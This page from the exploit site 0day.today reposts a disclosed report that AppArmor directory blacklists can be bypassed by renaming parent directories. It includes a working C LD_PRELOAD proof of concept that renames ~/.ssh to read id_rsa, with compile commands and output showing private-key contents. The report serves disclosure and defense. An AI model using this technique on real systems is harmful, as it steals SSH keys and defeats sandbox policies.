0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AppArmor Filesystem Blacklisting Bypass Vulnerability
[AppArmor: filesystem blacklisting can be bypassed by moving parents
Some AppArmor policies attempt to blacklist access to specific directories while broadly granting write access to everything else. For example, the Firefox profile uses the user-files abstraction, which broadly permits write access to owned files under /home while using the private-files abstraction to block access to some files like ~/.bashrc. Similar thing for the evince thumbnailer.
This is broken because if an attacker has write access to ~/.ssh/, but access to ~/.ssh/** is blocked, it is possible to rename ~/.ssh to ~/.ssh_, access ~/.ssh_/id_rsa, and rename ~/.ssh_ back to ~/.ssh.
Demo with evince:
user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ cat preload5.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
__attribute__((constructor)) static void entry(void) {
printf("constructor running from %s\n", program_invocation_name);
errno = 0;
int fd = open("/home/user/.ssh/id_rsa", O_RDONLY);
printf("open id_rsa direct: %d, error = %m\n", fd);
if (rename("/home/user/.ssh", "/home/user/.sshx"))
err(1, "rename");
errno = 0;
fd = open("/home/user/.sshx/id_rsa", O_RDONLY);
printf("open id_rsa indirect: %d, error = %m\n", fd);
if (rename("/home/user/.sshx", "/home/user/.ssh"))
err(1, "rename2");
char buf[1001];
errno = 0;
int res = read(fd, buf, 1000);
printf("read res: %d, error = %m\n", res);
if (res > 0) {
buf[res] = 0;
puts(buf);
}
exit(0);
}
user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload5.c -fPIC && LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
constructor running from evince-thumbnailer
open id_rsa direct: -1, error = Permission denied
open id_rsa indirect: 3, error = Success
read res: 1000, error = Success
-----BEGIN RSA PRIVATE KEY-----
[...]
user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: jannh
# 0day.today [2024-11-15] #